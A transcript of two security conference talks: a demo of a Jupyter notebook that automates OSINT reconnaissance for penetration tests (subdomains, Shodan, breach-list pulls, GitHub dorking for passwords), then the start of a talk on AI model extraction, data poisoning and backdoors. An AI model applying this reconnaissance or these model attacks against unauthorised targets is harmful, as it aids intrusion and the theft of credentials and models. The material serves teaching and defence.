But of course, a common problem is that you have all these subdomains, right? But I need to dedupe them. So within Jupyter itself, I have a small script to format and dedupe those subdomains. We'll take a look at this again: I have about 870 subdomains, not unique, but I want to sort them and get all the uniques from them. So in Jupyter, I can run the bash script that I wrote, or anybody can run it, regardless of whether they have bash scripting experience, and it'll give me an output that I wrote in Python to let me know it's complete, with the print complete statement. And I'll go ahead and go back to domains, refresh, and I'll see now that I'm left with 344

unique subdomains, right? So again, I hope this illustrates the ease of use with this. You're not typing commands, you're not copying, pasting from another notebook or from your notes. You have everything in a centralized repository for testing. And everybody can use the same standardized methodology for testing that you are.
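The sort-and-dedupe step just described can be sketched like this. This is a minimal Python version of the idea, not the speaker's actual Bash script, with made-up domains:

```python
# A small stand-in for the sort/dedupe step described above: take the combined
# subdomain list, normalize case, drop blanks and duplicates, and sort A to Z.
def dedupe_domains(lines):
    """Return the unique domains, lowercased and sorted."""
    return sorted({line.strip().lower() for line in lines if line.strip()})

combined = ["Mail.example.com", "dev.example.com", "mail.example.com", ""]
print(dedupe_domains(combined))  # ['dev.example.com', 'mail.example.com']
```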

And I'll go ahead and give a quick overview of some of the additional functionality inside of the notebook. And then I'll go ahead and do a run-all so you guys can kind of see how long it takes for the automation to run, for all these commands to run and things like that. But in a nutshell, kind of like I showed in the overview before, I'll be performing some additional commands, like verifying what domains are live with this bulk reverse DNS script. I'll be scraping emails with the Infoga tool. I'll be looking at Shodan, which is going to take all the IP addresses from the subdomains automatically and then put them into Shodan for running and searching on various queries. I'll

also be looking at cloud enumeration to see what cloud assets are available. We'll also be pulling from a breach list to see what information is on the breach list for the domain that we're using, which is Protiviti.com. Of course, that information will be redacted in the deliverable, so there will be no passwords or anything of that nature. And then a personal script that I've developed called GitDorker, which essentially automates the running of GitHub dorks against a specific domain. So for example, feeding in Protiviti.com, it would run a query on password, connection string, et cetera, et cetera. And of course, all that information is already redacted, and moreover, the only results that you'll see are from my own GitHub

repository that I use to kind of show fake results. And then towards the end, there is a parsing script that I wrote that will parse all the outputs from this notebook into a clean and nice Excel deliverable. So you can use that as a base point. You know, I'm not saying that this is like a perfect method for OSINT, but you can develop a very strong base to work off of, regardless of your experience, by using Jupyter notebooks and by collaborating with people and creating stronger Jupyter notebooks due to the modular nature. It's a very easy base to build off of and improve on in the future. I'll go ahead and run the Jupyter notebook in full, and the way I do that is I will start at

the top and I'll click Cell and Run All. So now the Jupyter notebook will start to go through each of these cells, and you'll see the start time printed. This is just something I wanted to put in to show you guys how quickly the Jupyter notebook can run. So it started at military time 15:45, or our time, 3:45 and 37 seconds. You can see that it's run through the setup script, so it's set the domain variables, and it's run again through the tool initialization script. And I'll go ahead and minimize this. And it's currently running through SubFinder, and it's gonna run through AssetFinder and go subsequently throughout

these different scripts that we wrote and also brought in from third-party resources or tools that were developed online. So again, there's a lot of functionality within Jupyter to put in your own customized scripts with Python and Bash scripting to create a truly modular framework for pen testing itself. And so as we go through, we can see that now the email gathering portion has started. And then after that, Shodan will start taking all the IPs that were automatically grabbed from the DNS probe, and then so on and so forth until all the tools are completed. So while we let this run, we can go back to this, but I want to give you guys a quick look at what the deliverable itself will

look like. So if you can see here on my screen, I have an Excel deliverable that would be parsed at the end of this notebook. So what I have is all my alive subdomains, unique and sorted A through Z, and the corresponding IP, which makes it a lot easier for a tester to just view and be like, okay, I know what's live, I know what to test, I can create a new column for comments, check what's there, check what's not there, standardizing that methodology so we're not running into inconsistencies while we're testing within teams. And again, here you can see the cloud assets that were output from the cloud enumeration tool that was used. You can see

a tab for IPs only if you want to do some further testing on IPs themselves. You can see the Shodan output of all the IPs that were queried, and you can see the various ports, of course, the results of those ports, and so on and so forth. And then you can also see the tool that I developed, GitDorker, where it will output the dorks themselves, the specific URL to hit to access the dork so you don't have to put together anything yourself, and the number of results for you to filter and search through.
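As a rough illustration of the dorking idea behind a tool like this (this is not GitDorker's actual code, and the dork list is a made-up sample), you can combine a target domain with each dork term into a GitHub code-search URL:

```python
from urllib.parse import quote_plus

# Simplified illustration of GitHub dorking: pair a target domain with each
# dork term and build a code-search URL for it. Dork terms are sample values.
DORKS = ["password", "connection_string", "api_key"]

def github_dork_urls(domain, dorks=DORKS):
    return ["https://github.com/search?q=%s&type=code"
            % quote_plus('"%s" %s' % (domain, dork)) for dork in dorks]

for url in github_dork_urls("example.com"):
    print(url)
```

A real tool would then fetch each URL (authenticated, rate-limited) and record the result counts, similar to the column shown in the deliverable.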

And then here's the breach list from the command that we ran to pull in breach list data from Dehashed. As you can see, everything's redacted for obvious reasons, so there will be no stealing of passwords here, but I did want to show you guys the functionality and the ability to pull large data sets relatively easily with Jupyter. And then finally, as you guys saw before I switched over, there was a script running called Infoga to pull email data. And so this is already cleanly parsed and scraped from Infoga and output into one clean deliverable. So again, there are no additional actions that I'm taking at the end of this notebook. All I'm doing is clicking Cell, Run

all, and then I'll have this whole entire Excel sheet parsed in a clean and nice format for me to continue on as a base for my testing. And so let's go ahead and go back to see the OSINT itself. So you can see that it's currently running the Shodan script. We can check back on this later to see how long it took. Typically Shodan will be the longest portion, but as you can see, the rest of the tools ran within seconds; because of the large number of IPs for the domain, Shodan might take a little bit more time. So what I'll do now is I'll go ahead and hand it off to Nate

for the infrastructure piece. Okay. So as Omar was going through the demonstration there, I'm sure a lot of people were thinking, what does the underlying infrastructure look like for something like this? I was thinking the same thing as we were actually going through this and creating and experimenting with things: what kind of horsepower do we need under the hood? What is this going to look like when we roll it out to an entire lab? So luckily, Jupyter is actually pretty lightweight, and a lot of the tools that we're using are also very lightweight. So we actually deployed this at first just on a t2.micro, moving up to a t2.medium in AWS.

So it's really accessible to anybody. And even in the demonstration that Omar did, it was actually running on a local Kali instance. So we prefer to use the cloud due to some of the collaboration ability with it, but this is something that anyone could run pretty much anywhere, on any flavor of OS that they want, as long as you're hitting the requirements for Jupyter itself. So talking about AWS, we really enjoy it because of, you know, being able to stick something, and really not just AWS but any cloud provider, being able to stick it on a public address and then actually restricting the security group and network ACL down to

just letting certain people or certain lab IP addresses or VPN addresses get to Jupyter itself, or really just to get to anything of ours. So by restricting that, but still opening it up to everyone, I'm able to jump on from my VPN network, my Protiviti VPN network. Omar's able to jump on from his in a different lab. So I'm able to jump on, do something; Omar's able to jump on and actually pull down that deliverable or go check how OSINT's going on one project. It's made it really collaborative from that point. So for us, we prefer to have a new instance each time for each new engagement, so there's no kind of data contamination

crossover. If a tool breaks, we're not worrying about it. And it also kind of opens up experimentation for people: hey, if you wanna add a new module to Jupyter, feel free to go ahead. If you break it, we'll just spin you up a new instance. And we're actually doing that through just Bash scripting. That's how we actually deploy Jupyter to Kali instances: just a Bash script that goes and pulls it down, pulls our configuration file, which Omar was talking about. You can customize SSL, put a password on it, change the default port, do all kinds of cool stuff with it. So really, it's accessible to anyone that wants to do automatic installs if

you want to. It's fairly simple. We're actually running it in a screen session. We've had a lot of good experimentation with that and have seen it prove out. Also, since our instances are disposable, we haven't had too many latency issues or issues with that.
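The configuration file mentioned here might contain settings along these lines. This is a sketch of a classic jupyter_notebook_config.py fragment, not the team's actual config; the paths and password hash are placeholders:

```python
# Sketch of a jupyter_notebook_config.py fragment like the one described:
# listen beyond localhost, change the default port, require a password, and
# serve over TLS. Paths and the password hash below are placeholders.
c.NotebookApp.ip = "0.0.0.0"             # reachable from the lab VPN
c.NotebookApp.port = 9999                # move off the default 8888
c.NotebookApp.open_browser = False
c.NotebookApp.password = "sha1:...:..."  # generate with notebook.auth.passwd()
c.NotebookApp.certfile = "/etc/jupyter/jupyter.pem"
c.NotebookApp.keyfile = "/etc/jupyter/jupyter.key"
```

With a file like this pulled in by the deploy script, each fresh instance comes up already locked down the same way.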

One of the great things about Jupyter is the extensibility with it and some of the kind of crazy use cases you can use it for. Also, a thing that I really love about it is that with the Markdown, you can actually be teaching people as they go, if it's their first time running something or the first time they're ingesting data into it. It is really impressive. There are so many different forms and tasks that you can actually integrate with Jupyter itself. Just an example is BloodHound. So you have all that data, but you want to actually do some cool custom queries, and you're doing it the same way on each engagement, but you want to automate

it, engagement to engagement, and make sure it's consistent throughout. Instead of actually querying Neo4j or the backend database yourself, you could actually just add that as a module into Jupyter and have it do it for you, have an explanation before it, and then have it run and output a nice deliverable that can help you with your hunting. Other things like that with offline data would be doing Active Directory reviews, doing Azure or other cloud provider reviews, or even O365 reviews, where you're pulling in large amounts of data, even raw data, into a database. And as long as you have an ability to actually query it, either through Bash, like the command line

itself, or through a database interface, you can actually automate that through Jupyter and still make it a one-at-a-time explanation and make it pretty simple and concise. Also, the reporting, as Omar showed with that Excel sheet output, really helps with kind of digesting and even making a formal deliverable for a client, or even for yourself if you're trying to stay organized doing bug bounty hunting and trying to keep everything sorted out. I know mine's sometimes a mess in notes. This has really helped keep it condensed and keep everything in one central spot.

So really, just to sum things up: if you can script it in any programming language and you can format it in Markdown, Jupyter can handle it. And the beauty of that, the modularity with it, and also keeping it in a simplified format, combined with its functionality of connecting it to, like, a Kali instance and having your custom tools on it, or just pulling in new cool tools from GitHub, the possibilities are really endless on this. Awesome, thank you, Nate. So before we go into some code release stuff, I think what we could do is go and check back on the Jupyter notebook, see how the runtime is.

I'm positive it finished probably along the same time when Nate was talking, but we didn't want to, you know, put a stall in the presentation. So just give me one second. So picking back up from where we left off, we were leaving off at Shodan. So we can see that a script for Shodan scraping is running to query all these IPs that we got from our reverse DNS. And it's already finished. It gives us some output saying that it's stored as Shodan; that's the name of the output file. Some vendor service enumeration was conducted using a tool called Cloud Enum, and it's given us these buckets that we saw previously in the Excel deliverable. And then a pull

for the Dehashed breach list, which we also saw with the redacted information. And then again, my personal tool, GitDorker, runs automatically inside. And you can see all the terminal output as well, showing you various links you can click on. Or, for probably an easier experience, you can go into Excel and handle everything how you want to, sort it, and so on and so forth. And again, you'll get output showing you where it's been stored. So I can go into the B-Sides demo folder and I can see all the information that's been stored individually. So if I want to go into emails, I can see emails. I have full rights to edit this. If I want to add something, I can add my email in here. Right. So

it's relatively simple. I can save it. So if I back out of this and go back in here, you'll now see my email. And so on and so forth for the rest of the outputs. The beauty at the end, as Nate reiterated, is that there's also a parsing script that runs at the end, which parses all the CSVs that were output into one Excel deliverable, which we demonstrated before. So it's relatively straightforward. Again, you can modify this as you'd see fit.
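The final parsing step described here can be sketched roughly as follows. This is a simplified, dependency-free stand-in that merges per-tool CSVs into one tagged summary file; the actual script writes an Excel workbook with one tab per tool, which could be done with pandas or openpyxl instead. The folder and file names are illustrative:

```python
import csv, os

# Minimal sketch of the final parsing step: merge each tool's CSV output into
# one summary file, tagging every row with the tool it came from. (The real
# notebook writes an Excel workbook with one tab per tool instead.)
def merge_outputs(folder, tool_files, summary_path):
    with open(summary_path, "w", newline="") as out:
        writer = csv.writer(out)
        writer.writerow(["tool", "value"])
        for name in tool_files:
            path = os.path.join(folder, name)
            if not os.path.exists(path):  # skip tools that produced nothing
                continue
            for row in csv.reader(open(path)):
                if row:
                    writer.writerow([name, row[0]])

# Example call (folder and file names are hypothetical):
# merge_outputs("BSides-demo", ["domains.csv", "emails.csv"], "deliverable.csv")
```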

We'll touch on code release once that comes up. And towards the end, we'll see that the Jupyter notebook itself had an end time of 15:56, or 3:56 our time. So we started at 3:45, so you had this whole Excel deliverable parsed and ready for you within 12 minutes, which I think is a great base, a great start, especially for somebody who has no idea what pen testing or bug bounty hunting is, or wants to get a start on their OSINT. This is a perfect way for them to get started, remove those barriers to entry, and have a good base to start off with in a relatively short amount of time. Remove all the wasted hours from training

and also expedite assessment time during penetration tests, especially for the corporate environment.

Now we'll go ahead and go back to the presentation itself.

Can you all see it? So talking about code release. For the release context, the Jupyter OSINT notebook is formatted like the rest of Jupyter notebooks, in the .ipynb format, so it is run within the Jupyter platform. Release date: we're planning to release within one week of the time that this presentation comes out. The release location will be my personal GitHub, so you can find that at github.com slash obheda12 as well. And I'll have some information coming out regarding blog posts and how to really perform Jupyter modifications or create your own Jupyter notebooks through my Twitter, which is the same handle, obheda12.

And then lastly, just some follows, such as how to contact us. I already mentioned mine, but you can follow Nate at naterang on Twitter. But aside from that, that concludes our presentation. Again, super happy to be here. Really thankful to all the folks at B-Sides that made this possible, especially with the hassle of everybody being remote and the craziness that is COVID. So shout out to those guys. And now we'll be taking any questions if anybody has some.

Hi everybody, I'm Pesto. Thanks so much for coming to my talk on AI security here at B-Sides DFW 2020. It's my second year in a row doing B-Sides DFW. I'm super excited to be here. I'm so excited to talk to you about AI security, some of the projects I've been working on, some of the things I've learned over the last year. Let's start out real quickly going over kind of what the presentation is going to look like from here. I'll introduce myself and talk a little bit about AI, a little bit of a 10,000-foot view of AI security, before we talk about some of the specific threats and attacks that we deal with in

AI security. Some further considerations; those are really important, really interesting. And finally, we'll go over a little bit about how we might mitigate some of these attacks. Hopefully we'll do a good Q&A afterwards too. So just to start out, I've been doing this for about 20 years. I met up with a fun group back in the late 90s, early 2000s, named Ninja Networks. I've been hanging out with them for a long time. We used to do a lot of fun things at DEF CON. Mostly them; I was kind of the distant Texas contingent of Ninja Networks. But nonetheless, we did a lot of fun things at DEF CON, and I've sprinkled in some pictures of the shenanigans at DEF CON over the years from Ninja

Networks that I think are fun, so I hope you enjoy those. But apart from that, I've actually been a professional since 2000. Started out doing things like firewalls and IDS, you know. But since then I moved on to doing some more pen test and incident response stuff, a little bit of forensics work. For the last 10 years, I dealt mainly with insider threat, with corporate insider threat, and I became somewhat of a specialist in that field. But for the last year, I started a new job doing AI security, and this is what I'm here to talk to you about today and go over some of the cool stuff that I've learned. And it's important to understand about my background,

that I don't come from a data science background. I don't come from a mathematics background. I come from a hacker background and an information security background. So I'm approaching AI security from that angle, whereas a lot of the researchers who are into AI security have a more formal education background, or more background in science and data science. Before we go any further, I want to make it clear that even though I do this for a living and even though I went to school for this, none of the information I'm presenting here is representative of my company or of my school. These are all results of my own research over the last year into AI security and shouldn't be considered official statements from any particular

organization. So with that in mind and that out of the way, let's talk a little bit about AI. And the first thing I want to do is differentiate the term AI from some of the other terms, right? I'm going to use the term AI because it's easy and people recognize it, but it's really not the most precise term. AI has been around for a long time and it encompasses a lot of different technologies, a lot of different concepts. More specifically, I'm mainly talking about neural networks. And neural networks are one technique that enables machine learning, and machine learning is one type of AI. So that's the relationship between neural networks, machine learning, and AI. Again, forgive me, I choose to use the term

AI. 99 times out of 100 in this talk, you can substitute the words neural networks for AI and you'll be right. We should also talk a little bit about machine learning. It mainly falls into two categories. The first category is where I have a bunch of data and I don't really know how to organize this data. I don't really know what groups exist within this data, and I need a way to kind of sort them out, separate them out, and cluster them together. So I have models that allow me to do that by looking at the data without any other information. So this is a priori: just looking at the data, what do I see inherent in the data that I can make divisions or separations on? And that's

called unsupervised learning. We're mainly not talking about unsupervised learning in this talk. What we're mainly talking about is supervised learning. And what that means is that, on top of the data, I provide labels for that data. So the example I'm going to use throughout this talk is an AI model that identifies hot dogs in pictures. You send it a picture; it tells you if there's a hot dog in there. The way we would do this, theoretically, is we would have this huge selection of hot dog pictures from all different angles, right? All different types of hot dogs, all labeled hot dogs, so the AI knows what they are. The AI learns what a

hot dog looks like from all of those pictures, and that's called the training data or the training set, right? And once it's trained based on that training set, it can kind of generalize the abstract concept of a hot dog, meaning that when you send it new pictures of hot dogs that it's never seen before, it still knows it's a hot dog, because it's so clever, because we've trained it so well off of our training set. It's important that we have a basic understanding of what training data is, because it factors a lot into AI security.
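As a toy illustration of the training-then-generalizing idea described above (not how a real image model works; the two-number "features" and points are invented), here is a tiny nearest-centroid classifier:

```python
# Toy illustration of supervised learning as described above: learn from a
# labeled training set, then classify an unseen example. The 2-D "features"
# are made up; real image models learn from pixels, not two numbers.
def train_centroids(training_set):
    """training_set: list of ((x, y), label). Returns per-label mean points."""
    sums = {}
    for (x, y), label in training_set:
        sx, sy, n = sums.get(label, (0.0, 0.0, 0))
        sums[label] = (sx + x, sy + y, n + 1)
    return {lbl: (sx / n, sy / n) for lbl, (sx, sy, n) in sums.items()}

def classify(centroids, point):
    return min(centroids, key=lambda lbl: (centroids[lbl][0] - point[0]) ** 2
                                        + (centroids[lbl][1] - point[1]) ** 2)

train = [((1, 1), "hot dog"), ((2, 1), "hot dog"),
         ((8, 9), "not hot dog"), ((9, 8), "not hot dog")]
model = train_centroids(train)
print(classify(model, (1.5, 1.2)))  # a new, unseen point near the hot dogs
```

The point of the sketch is the same as the talk's: the model generalizes from labeled examples, so whoever controls those examples controls what it learns.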

With that out of the way, I want to kick things off by showing an example of why AI security deserves special consideration. And it's one of the key takeaways from this talk. One of the things I really want to impress is that we may think that because AI is just a program, it doesn't really need any special treatment. It's an application, right? And we already have tons of

security practices around how to secure applications, right? All up and down the stack. But one of the things I'd like for you to take away, if I do a good job explaining this to you, is the idea that that just doesn't work for AI. There are special considerations when we talk about this kind of AI, especially these neural networks, and why there are special considerations. So in this picture, in this GIF, we see researchers projecting white lines with a commodity projector onto the road, and the car thinks that it's an actual lane and the car swerves. And we can understand why this would be very dangerous if this were to be done, you know, outside of controlled research. Now, this isn't especially technical or sophisticated. After all,

a sleepy driver may actually make the same mistake, right? One of the things we can't really get into is the philosophical difference between an AI making a mistake and a human making a mistake. But there is a big difference. What I wanted to focus on was thinking about the information security principles that we all know. How would any of them stop this attack? Right. There are some things that are kind of universal, but the point I want to make is that there are no firewalls or lockdowns or, you know, encryption that's going to fix the guy on the side of the road with the projector. Some of you might have seen the guy who caused a traffic jam on Google Maps by having a Radio Flyer

wagon full of cell phones with the location turned on. Call this the Radio Flyer attack. This is one kind of attack, I should say, that we have to take into consideration when we're deploying AI into the wild.

I want to bring to your attention this graph on the right. This was made by a man named Nicholas Carlini, who's a bit of a rock star in AI security. He helped create an attack called the Carlini-Wagner attack, named after him and the co-author. He's done tons of talks, writes tons of papers; he's a very accomplished researcher and developer. He keeps track of all the research papers that are released on a specific type of AI security flaw, an attack called adversarial examples, or adversarial perturbations. And we're going to talk about those later on today. But they're just one type of attack. And you can see here, just in the last year, we're talking about people releasing more

than one paper a day. It's blowing up. And I personally haven't seen anything so Wild Wild West since the late 90s or early 2000s, since the internet boom. Back then, you couldn't get a degree in information security. I don't know if there were any real certifications back when I started. There was very little way to find good guidance on how to secure networks. It's very similar in the AI space today: because these attacks are specific to AI and they're not covered by traditional information security practices, it's a bit of the Wild Wild West, and there's not any real authority we can look to for guidance on how to securely deploy AI. And that's the second takeaway I want you to have from this talk is

that this is important, and right now it's really open, and there's not a lot of guidance there. We'll talk about the third takeaway a little bit later, but if we at least remember the first two, that information security practices aren't going to cover it for AI and that there's no established guidance, then I think we've done pretty well already. I'll see if I can convince you of some of this as we go on. Let's talk about why AI is at risk. This may be apparent to some of you. It may not be. A lot of us just like to hack things because we think it's fun, even though it may not benefit us in one way or another other than bathing in the sweet

glory of the attack. But this is the real deal. If you have, for example, an AI that predicts whether or not an applicant will pay back a loan, and based on that decision, your financial institution chooses to give this person money or not: if I were somebody with not very good credit, it might benefit me to get an answer out of that AI, to persuade that AI, to trick that AI into making a decision it wouldn't normally make. Another attack is not about getting a favorable decision, but about stealing the model itself. This may be IP, it may be a competitive advantage, whatever. Stealing the model itself is also another attack. And finally, there's the information that was used to train the model. I'm going to talk a

little bit about how that's at risk. What's important, I guess, to say at this point is that almost none of the attacks we're going to talk about require privilege escalation. These aren't hacks in that sense of,

you know, gaining authorization where you didn't have it, or exploiting

in order to penetrate a defense or access a server or access a resource. We're not going to do any of that stuff. We're simply going to use the AI in a way that it wasn't intended to be used. It's pretty fun. But I wanted to make clear that very little of this requires privilege escalation. There are a couple of times that we think about what could happen if somebody didn't have access, but I try to stay away from that stuff. Next is the CIA triad. You may recognize this. If you don't, don't worry. This is a way that a lot of information security is taught: that if we consider the confidentiality, integrity, and availability of our data, then we're doing a good job

of securing that data. We're improving our security posture the more that we can assure the confidentiality, integrity, and availability of our data. What I'm going to do is talk a little bit about how these differ when we talk about AI from what they mean when we talk about information security. I'm also going to show you how this falls short and what needs to be added to it to cover AI. And I'm going to start out by fudging a little bit and saying availability is pretty much availability. I don't know of any real special, specific attacks on availability. I mean, it's either available or not. Yes, you can ask it so many questions that it can't answer any others. But just know it's better that your model is

available than if it's not available. But barring availability, we're going to talk about AI specific threats, how they fit into the CIA triad, and how they don't fit into the CIA triad. Start out with confidentiality. In traditional information security, right, confidentiality is about, you know, data that shouldn't be seen by people unseen, right? When we think about confidentiality, we think about like authorization, you know, encryption, right? Perimeter defenses. A lot is covered under confidentiality. It's about keeping private data private, right? Same thing in AI, but specifically, right? When we talk about, when I talk about confidentiality in AI, what I'm talking about is an attack called model extraction. I'm talking about keeping the model private. AI is almost, as far as I

know, unprecedented in how much information is available on it. If you wanted to go build a very powerful nuclear submarine, you may be able to find plans on the internet, download them, and build it. And it may work; I don't think so, and I wouldn't do it. But you can do that with AI. And AI is very, very powerful. Granted, maybe not as powerful as a nuclear submarine, but you never know when you're dealing with AI, right? And it's all out there, and it's relatively easy. I won't say it's simple, but it's relatively easy to get started in and to start building your own models. Tons of free classes out there, tons of YouTube videos. It's wide open. And AI, neural

networks especially, have a feature known as transferability. And what transferability means is that an AI that's good at doing one thing is probably good at doing that thing, right, across the board, no matter what the inputs are. Let me explain it a little bit better. If I had, you know, my hot dog identifier, you could throw any hot dog at this AI, and you're not going to get a hot dog past it. This model is just the best hot dog identifier in the universe, right? Chances are, if it's good at identifying hot dogs, it's probably also good at identifying enemy warcraft, er, enemy aircraft, right? Or political dissidents, right? Or things that we weren't necessarily thinking of when we designed this model; used in ways that we didn't want

it to be used, or may not have known it could be used for. This makes models particularly attractive for theft, right? If you have a model that's really good and I want that model, then perhaps I might try to steal that from you. And one of the ways we could do that is, yeah, to throw the server that it's on onto the back of a truck, or we could, you know, get a shell and SCP it out, or whatever. But what I'm going to talk about is something called model extraction. And in this attack, what we're doing is we're basically asking your AI a lot of questions and learning from the answers, actually getting your AI to

train my AI. So if I wanted a hot dog identifier, I might build a rudimentary model that basically just learns, right, from another model, from your model. And I send your model: hey, is this a hot dog? And your model says, yes, that's a hot dog. Well, now my AI knows it's a hot dog, right? And if you say, no, it's not, well, I know that that picture is a little bit different and that's not a hot dog. And I can build this very similar training set and I can optimize, right, my AI to match your answers. And once I've done that, once your AI has trained my AI, we have an AI that is almost

indistinguishable. I've basically copied your model. I've extracted your model. And then I can do a lot of things with it. For example, I can transfer it to identify other things, perhaps Warcraft, whatever that is, right? I guess the box DVD sets, I don't know. Enemy aircraft or whatever else I want. So that's transferability, right? That's model extraction. And there's one more concept I want to talk about, and that's the concept of a surrogate model. There's one more use for this. If I extract your model, I now have this surrogate copy. And what I can do is hammer at that with a bunch of different attacks, trying to see what works. And once I've got an attack down, then I can launch it against

your AI, fairly confident that it will work because it worked against the surrogate. Does that make sense? So it's kind of like having your own lab copy to hammer on. So that's the surrogate model, model extraction, and model transferability. Oh yes, and machine learning as a service. Let's say your business is providing machine learning services; for example, other people might want their pictures, their hot dogs, identified in pictures. So they might, you know, pay you a nickel each time they send you a query asking if there's a hot dog in this picture, right? So what might happen is that each time they're asking you, they're training another model, until they don't need

your model anymore, because they've got a surrogate model and they don't need your service anymore. If you're offering machine learning as a service, this is something to be aware of: your business in particular is susceptible to this kind of attack, or at least this kind of attack would affect you more than it would affect other people.
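The query-and-copy loop described above can be sketched in a few lines of Python. Everything here is hypothetical: a "victim" classifier reduced to a single secret threshold on one made-up "redness" feature, and a surrogate fit purely from the victim's answers.

```python
import random

def victim_model(redness):
    """The target 'hot dog' classifier we can only query, not inspect.
    Its decision rule (threshold 0.62) is secret from the attacker."""
    return redness > 0.62

def extract_surrogate(query, n_queries=1000, seed=0):
    """Label random probes with the victim's answers, then fit the
    simplest surrogate consistent with them: a threshold halfway
    between the highest 'no' and the lowest 'yes' we observed."""
    rng = random.Random(seed)
    probes = [(x, query(x)) for x in (rng.random() for _ in range(n_queries))]
    highest_no = max(x for x, label in probes if not label)
    lowest_yes = min(x for x, label in probes if label)
    threshold = (highest_no + lowest_yes) / 2
    return lambda redness: redness > threshold

surrogate = extract_surrogate(victim_model)

# The surrogate now agrees with the victim almost everywhere,
# without us ever having seen the victim's internals.
test_points = [i / 500 for i in range(500)]
agreement = sum(victim_model(x) == surrogate(x) for x in test_points) / len(test_points)
print(f"agreement: {agreement:.3f}")
```

A real extraction attack does the same thing against a neural network, substituting gradient-based optimization for the threshold bisection, but the economics are identical: every answered query leaks a little of the model.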

So we talked about model extraction and surrogate models and a bunch of cool stuff. I'm going to talk about integrity now. When we think of data integrity or file integrity, we're talking about making sure that we can trust the data, that it hasn't been fiddled with, that we can trust where it's coming from, things like that. Technologies that come to mind are things like hashing, you know, checksums, things of that nature, certificates. But with AI, I'm going to talk a little bit about poisoning. And data poisoning is, I think, a fairly intuitive concept. If I am depending on this training set, I'm depending that all of these things are labeled correctly. I'm depending on that fact, I should say. Well, if you're able

to put in a bunch of pictures of hamburgers labeled hot dogs, then my model learns that hamburgers look like hot dogs, and it starts incorrectly identifying hot dogs where there are none. If I'm able to put in those pictures of the hamburgers, then I've poisoned your model. Now, one way to do that is to, yes, access the database without authorization, or the data warehouse, wherever these pictures are, and just put them there. But I'm not really going to talk about that too much, because I think traditional information security practices would apply there. What I am going to talk about is the fact that we often don't have control of the training data. We often put that control initially in

the hands of end users or even the public at large, right?
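A toy sketch of what label poisoning does to a model trained on user-supplied data. The nearest-centroid classifier, the single "elongation" feature, and all the numbers here are invented for illustration; real attacks target far richer models, but the mechanism, mislabeled points dragging the decision boundary, is the same.

```python
def train_centroids(examples):
    """Nearest-centroid 'hot dog' classifier: average the feature
    value of each class in the training set."""
    by_label = {}
    for feature, label in examples:
        by_label.setdefault(label, []).append(feature)
    return {label: sum(v) / len(v) for label, v in by_label.items()}

def classify(centroids, feature):
    """Pick whichever class centroid the input is closest to."""
    return min(centroids, key=lambda label: abs(feature - centroids[label]))

# Clean training set: elongation feature, honest labels.
clean = [(0.9, "hot dog"), (0.8, "hot dog"), (0.2, "hamburger"), (0.3, "hamburger")]
model = train_centroids(clean)
print(classify(model, 0.3))            # hamburger: the clean model gets it right

# Poisoning: an attacker submits hamburger-shaped pictures labeled "hot dog",
# dragging the hot dog centroid toward hamburger territory.
poison = [(0.2, "hot dog")] * 8
poisoned_model = train_centroids(clean + poison)
print(classify(poisoned_model, 0.3))   # hot dog: the boundary has moved
```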

A good example is spam filters. So let's say you have a button that says report spam. You see spam in your inbox and you click report spam. I want you to imagine that that is sent to an AI. What you send to the AI is the content, the piece of spam, and the label: this is spam. Well, then you can build a training set, and your model can learn what spam looks like. And when we roll out that model, it'll start denying those kinds of emails. So what will happen, of course, is that the spammers will change

how the spam looks a little bit until it bypasses the filter, and you click "this is spam" again, and then your model is updated. In this case, we've ceded control of our training set to the users. And enough malicious users, or enough malicious use, or the right malicious use, could enable a spammer to bypass the spam filter basically by mislabeling data, or something a little more sophisticated than that, like including those phrases in the pieces of email. But you can think of it simply: the model says, okay, there's a line, and all the spam is over here, right? And all the ham, all the good email, is over here. And what we want to do is take email from this side and we

want to put it on that side, and that'll allow us, right, to send that email. And what we need to do is just move that line a little bit. That's called model drift, right? And that's an indicator of model poisoning, of doing exactly what we just talked about. One way to measure this, a good way to mitigate this, is to have a known input and known output of your model and make sure it's consistent, or, if it's not, that you understand why. Because if you're suddenly starting to get different answers, it may be an indication of model drift, and model drift can happen in the normal course of business but could also be an indicator of compromise.
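The known-input/known-output check suggested above might look something like this sketch; the canary values and the toy spam scorers are made up for illustration.

```python
def check_canaries(model, canaries):
    """Run known inputs through the model and compare against the
    answers recorded when the model was known-good. Any mismatch is
    drift: possibly benign retraining, possibly poisoning."""
    return [(x, expected, model(x))
            for x, expected in canaries
            if model(x) != expected]

# Recorded when the model was deployed: input -> expected label.
canaries = [(0.9, "spam"), (0.1, "ham"), (0.55, "spam")]

def healthy(score):
    return "spam" if score >= 0.5 else "ham"

def drifted(score):
    return "spam" if score >= 0.6 else "ham"   # decision boundary has moved

print(check_canaries(healthy, canaries))   # [] -- all canaries still pass
print(check_canaries(drifted, canaries))   # the 0.55 canary now flips to "ham"
```

Canaries near the decision boundary (like 0.55 here) are the most sensitive; inputs deep inside a class will pass the check long after the boundary has started to move.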

Backdoors. The terminology here isn't necessarily the same as what it would be in InfoSec. Not everybody uses the term backdoors, but there are papers that use the term. What they mean when they say backdoor is basically poisoning the data and, not really hiding the fact, but not exploiting it until later. That's all it means. So for example, say we had right turn signs, and we were teaching cars to learn what a right turn sign is by noticing a car turning right, then noticing all the signs that are around it, and finding the common right turn sign. Well, let's say someone started putting markings on those right turn signs, and your AI learns that those markings are part of what a right turn sign looks like, and you deploy this model,

you know, in all of your wonderful cars. No one's going to notice anything wrong. A right turn sign doesn't have to have those markings; the model can see the rest of the sign and say it's still a right turn sign. But if it does see those markings on something like a stop sign, if I then go put those markings on stop signs and it's able to fool your AI, then I've triggered that backdoor. So it's still model poisoning. It's still, in this case, data poisoning, but it's not really evident and it's not really triggered till later, and that's why it's called a backdoor. So again, no privilege escalation is required to do this in many, many cases, especially when dealing with model drift. And

the spam filter was one example, but it's surprising how often, because it takes so much data to train AI, that data is sourced from places out of our control. We talked about the C, talked about the I, glossed over the A. Now we're going to talk about the R and P. And I would like to introduce you to the CIARP Pentad. It's a very catchy name. This is not a thing. I just made this up. But if you want to make it a thing, I'm cool with that. You can just go around talking about the CIARP Pentad as if everybody should know what it is. I think that you should. Absolutely. But anyway,

I've added privacy and robustness. Privacy? We all know what it is. We all know how important it is. We all know that nobody cares about it, but they should. I'm going to differentiate why privacy is a little bit different when we talk about AI. But I'm going to spend the most time talking about robustness and adversarial perturbation. This is what Nicholas Carlini was graphing earlier, and this is really the meat and potatoes of AI security. This is what all the hubbub is about. This is where a lot of the research is. So let's get into it, right? Model robustness is the ability, or the degree to which, your model withstands attacks from adversarial perturbations.
